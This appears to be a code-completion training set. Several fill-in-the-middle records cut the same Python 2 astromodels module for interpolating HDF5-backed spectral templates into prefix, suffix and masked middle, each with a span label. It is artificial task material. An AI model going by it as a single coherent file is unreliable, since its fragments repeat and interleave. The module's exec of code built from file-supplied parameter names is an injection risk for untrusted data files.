self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
|
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| self.K.unit = y_unit
self.scale.unit = 1 / x_unit | identifier_body |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def | (self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| add_method | identifier_name |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
|
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized) | conditional_block |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
